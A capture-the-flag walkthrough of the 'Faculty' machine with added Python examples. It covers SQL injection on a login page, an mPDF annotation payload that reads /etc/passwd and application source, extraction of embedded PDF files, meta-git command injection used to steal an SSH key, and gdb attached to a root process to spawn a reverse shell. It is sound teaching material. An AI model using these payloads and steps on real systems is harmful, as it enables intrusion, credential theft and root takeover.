# Faculty

## Gaining Access

As usual, we start with a Nmap scan.

<figure><img src="/files/Zkfq5wRVrF4SuOkWVC2x" alt=""><figcaption></figcaption></figure>

There's the `faculty.htb` domain running on port 80. We can add this to the `/etc/hosts` file.

### SQL Injection

Basic PHP login page for a Faculty Scheduling System is present here:

<figure><img src="/files/wIyxrvGL23qXKKDLfd3K" alt=""><figcaption></figcaption></figure>

Checking for common directories such as the `/admin` endpoint reveals another login page.

<figure><img src="/files/n3oiuHKn0DOucGCLEoak" alt=""><figcaption></figcaption></figure>

With the traffic proxied through Burp, submitting a single `'` as the username triggers an SQL error, which means the input is being concatenated straight into the query.

<figure><img src="/files/5RBaEadZ3m4tnh1Gdc3W" alt=""><figcaption></figcaption></figure>

With the injection point confirmed, we can point `sqlmap` at the login request and have it enumerate and dump the tables in the database.

<figure><img src="/files/baj5qjfe4iZfju0dyZ3T" alt=""><figcaption></figcaption></figure>
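The pattern behind that error, shown here as an added example that is not the application's code: a login query built by string interpolation beside the same lookup with bound parameters. An in-memory SQLite table stands in for the real `users` table, and the schema and row values are assumptions of this example.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the app's users table (not the real schema)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.execute("INSERT INTO users (username, password) VALUES ('Administrator', 'not-the-real-hash')")
    return con


def login_vulnerable(con, username, password):
    """Builds the query by string interpolation: the bug a lone ' exposes."""
    sql = (f"SELECT id FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return con.execute(sql).fetchone()


def login_safe(con, username, password):
    """Same lookup with bound parameters; input never reaches the parser as SQL."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchone()


def classify(login, con, username, password="x"):
    """What a tester sees for one probe: 'error' (the query broke, so input is
    parsed as SQL), 'accepted' (a row came back) or 'rejected' (no row)."""
    try:
        row = login(con, username, password)
    except sqlite3.Error:
        return "error"
    return "accepted" if row else "rejected"


if __name__ == "__main__":
    con = make_db()
    # The comment marker in the second probe drops the password check entirely.
    for probe in ("'", "' OR 1=1 -- ", "Administrator"):
        print(f"{probe!r:20} vulnerable={classify(login_vulnerable, con, probe)} "
              f"safe={classify(login_safe, con, probe)}")
```

The `'` probe breaks the vulnerable query but is simply a non-matching username for the parameterised one, and the `' OR 1=1 -- ` probe logs in without a password only against the vulnerable form.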

The `users` table has an `Administrator` user with a hashed password, but the hash does not crack.

<figure><img src="/files/utrMEMJeMAs6ZL7BDzT2" alt=""><figcaption></figcaption></figure>

Instead, we can dump the `faculty` table and try the original (non-admin) login. It has a PIN associated with the `Administrator` user, and that PIN lets us log in.

<figure><img src="/files/CBsSaFHbT3p5MEkz9p2V" alt=""><figcaption></figcaption></figure>

### PDF Generator LFI

Within the website there is a PDF generator that exports the schedule for selected courses.

<figure><img src="/files/XYNPKxRTm6NVb7R2SxqE" alt=""><figcaption></figcaption></figure>

We can download this PDF and use `exiftool` to find out more information about it.

<figure><img src="/files/7Tsu6mHcOeo2Aq5jfYeM" alt=""><figcaption></figcaption></figure>

The PDF was produced by mPDF 6.0, which is vulnerable to a local file read: an `<annotation>` tag whose `file` attribute names a server-side path makes mPDF embed that file in the output as an attachment. The generator takes its input Base64-encoded, so we send this payload encoded with Base64:

{% code overflow="wrap" %}

```
<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="Attached File: /etc/passwd" pos-x="195" />
```

{% endcode %}

The generated PDF then carries `/etc/passwd` as an attachment.

<figure><img src="/files/Msy30cAN3AwnkP0rHOBL" alt=""><figcaption></figcaption></figure>

The `/etc/passwd` file is attached to the main PDF like this:

<figure><img src="/files/So3qjg2pyXURRbHkkuQH" alt=""><figcaption></figcaption></figure>

Opening the attachment gives us the list of accounts on the machine, and in particular which of them have a real login shell.

<figure><img src="/files/yyYspcEhlY8YVsU6ZybX" alt=""><figcaption></figcaption></figure>
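The three steps above, building the `<annotation>` payload, pulling the attachment back out of the returned PDF, and picking the accounts worth targeting from `/etc/passwd`, as an added Python example that is not part of the original writeup. The PDF parser is a deliberately small one written for this page (direct `/Length` values and FlateDecode only), the sample PDF and the passwd excerpt are constructed fixtures, and `build_sample_pdf` only mimics the shape of an embedded-file stream rather than real mPDF output.

```python
import base64
import re
import zlib


def mpdf_annotation(path):
    """The <annotation> tag mPDF turns into a file attachment; `file` is read server-side."""
    return (f'<annotation file="{path}" content="{path}" icon="Graph" '
            f'title="Attached File: {path}" pos-x="195" />')


def encode_payload(path):
    """The generator on the box takes its input Base64-encoded, so wrap the tag."""
    return base64.b64encode(mpdf_annotation(path).encode()).decode()


def decode_payload(b64):
    return base64.b64decode(b64).decode()


# Direct /Length only; the \b stops "/Length 12 0 R" from matching as 1.
_LENGTH = re.compile(rb"/Length\s+(\d+)\b(?!\s+\d+\s+R)")


def extract_embedded_files(pdf):
    """Pull every /EmbeddedFile stream out of raw PDF bytes.

    For each `stream` keyword, walk back to the enclosing `obj` to get the
    stream dictionary, slice the body by its /Length (falling back to the next
    `endstream`), and inflate FlateDecode streams. Indirect /Length objects and
    other filters are not handled; this is a triage tool, not a PDF library.
    """
    files = []
    for m in re.finditer(rb"\bstream\r?\n", pdf):
        start = pdf.rfind(b" obj", 0, m.start())
        dictionary = pdf[start:m.start()]
        if b"/EmbeddedFile" not in dictionary:
            continue
        length = _LENGTH.search(dictionary)
        if length:
            body = pdf[m.end():m.end() + int(length.group(1))]
        else:
            body = pdf[m.end():pdf.find(b"endstream", m.end())].rstrip(b"\r\n")
        if b"/FlateDecode" in dictionary:
            body = zlib.decompress(body)
        files.append(body)
    return files


def shell_users(passwd_text, min_uid=1000):
    """Accounts worth targeting from /etc/passwd: root plus uid>=1000 with a real shell."""
    users = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            continue
        name, uid, shell = fields[0], int(fields[2]), fields[6]
        if (uid == 0 or uid >= min_uid) and not shell.endswith(("nologin", "/false")):
            users.append(name)
    return users


def build_sample_pdf(data, compress=True):
    """Constructed minimal PDF carrying `data` as an embedded file (test fixture, not mPDF output)."""
    body = zlib.compress(data) if compress else data
    filt = b"/Filter /FlateDecode " if compress else b""
    return (b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\n"
            b"2 0 obj\n<< /Type /EmbeddedFile " + filt
            + b"/Length " + str(len(body)).encode() + b" >>\nstream\n"
            + body + b"\nendstream\nendobj\n%%EOF\n")


# Constructed /etc/passwd excerpt; the real file is in the screenshot above.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
gbyolo:x:1000:1000::/home/gbyolo:/bin/bash
developer:x:1001:1001::/home/developer:/bin/bash
"""

if __name__ == "__main__":
    print(encode_payload("/etc/passwd"))
    for blob in extract_embedded_files(build_sample_pdf(SAMPLE_PASSWD.encode())):
        print(shell_users(blob.decode()))
```

`encode_payload` is the piece you paste into the intercepted request; the other two functions are for the response, so you do not have to open every PDF in a viewer to see what came back, which matters once you start pulling source files rather than `/etc/passwd`.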

With file read in hand, the next target is the application's own source, since a file such as `admin.php` or `db.php` is likely to hold database credentials. A quick `gobuster` scan turns up `db_connect.php`, which we read the same way and find a password in.

<figure><img src="/files/vZh9obSpmZPiKZgWd08y" alt=""><figcaption></figcaption></figure>

The database password is reused for the `gbyolo` account, so we can `ssh` in as `gbyolo` with it.

## Privilege Escalation

### Meta-Git RCE

The other user found on the machine is the `developer` user. When checking the `sudo` privileges of the `gbyolo` user, we find this:

<figure><img src="/files/F37aqyZ2PMfrOU3tdD1u" alt=""><figcaption></figcaption></figure>

`meta-git` is the git plugin for `meta`, a tool that runs git commands across a set of repositories. The installed version has a command-injection bug (the report below), and since the `sudo` rule lets `gbyolo` run it as `developer`, that bug gives us command execution as `developer`.

{% embed url="<https://hackerone.com/reports/728040>" %}

Using the PoC from the report, we read the `id_rsa` file from `developer`'s home directory.

<figure><img src="/files/tCJAZevWH5nMnQJ2Po5D" alt=""><figcaption></figcaption></figure>

Then, we can SSH in as `developer`.
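The bug class behind the meta-git report, as an added example that is not meta-git's code: a repository argument concatenated into a shell command line, beside the same call validated and passed as an argv list so no shell ever parses it. `echo` stands in for `git clone` so the block runs without git or a network, and the `REPO_OK` pattern is this example's own assumption about what a repository argument may look like, not meta-git's validation.

```python
import re
import subprocess

# Repository arguments we are willing to pass on: no shell metacharacters and
# no leading '-', which git would otherwise parse as an option. Assumption of
# this example, not meta-git's own rule.
REPO_OK = re.compile(r"[A-Za-z0-9][A-Za-z0-9._/:@-]*")


def is_valid_repo(repo):
    return REPO_OK.fullmatch(repo) is not None


def clone_vulnerable(repo):
    """Command line assembled by concatenation and handed to /bin/sh.

    `echo` stands in for `git clone`; what the shell does with `repo` is the
    same either way.
    """
    result = subprocess.run("echo cloning " + repo, shell=True,
                            capture_output=True, text=True)
    return result.stdout


def clone_hardened(repo):
    """Validate first, then pass argv as a list: `repo` is one argument, never shell text."""
    if not is_valid_repo(repo):
        raise ValueError(f"refusing repository argument {repo!r}")
    result = subprocess.run(["echo", "cloning", repo],
                            capture_output=True, text=True)
    return result.stdout


def was_injected(output):
    """True when the marker ran as its own command, i.e. produced its own line."""
    return "INJECTED" in output.splitlines()


if __name__ == "__main__":
    evil = "x; echo INJECTED"
    print(repr(clone_vulnerable(evil)), was_injected(clone_vulnerable(evil)))
    print(repr(clone_hardened("git@github.com:org/repo.git")))
    print(is_valid_repo(evil))
```

With `sudo` in the picture the injected command runs as whichever user the rule names, which is exactly how the `id_rsa` read above works: the shell metacharacters in the argument are interpreted by the shell that `meta-git` spawns as `developer`.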

### GDB Attaching

Doing initial enumeration reveals that the `developer` user is part of the `debug` group.

<figure><img src="/files/9TZwbVFUJ1pmjOCNivXZ" alt=""><figcaption></figcaption></figure>

Running LinPEAS also flags `gdb` as something members of the `debug` group can use.

<figure><img src="/files/Nn3dE71r5izsWRn8v3b8" alt=""><figcaption></figcaption></figure>

Here `gdb` can attach to a process that is already **running as root** and make it execute code on our behalf. Attaching stops the process, and from the debugger we can have it call `system()`; the child it spawns inherits the parent's uid, so whatever command we name runs as root. Attaching to another user's process normally requires `CAP_SYS_PTRACE`, and Yama's `ptrace_scope` restricts it further, so the checks worth running first are `getcap -r / 2>/dev/null` (to see what the `gdb` binary has been granted) and `cat /proc/sys/kernel/yama/ptrace_scope`.

First, we would need to find a process running as root, and preferably a Python or Bash one so we can execute commands easily.

<figure><img src="/files/rravkq5jxUTFRcz4FvRa" alt=""><figcaption></figcaption></figure>

The PID here is `621`, so `gdb -p 621` attaches to it. From the gdb prompt, `call system("...")` with a reverse shell command spawns that shell as root.

<figure><img src="/files/verFTFawgo6dmxpd0Ral" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/1C8cM2tc9ZzLS0eXhQM4" alt=""><figcaption></figcaption></figure>
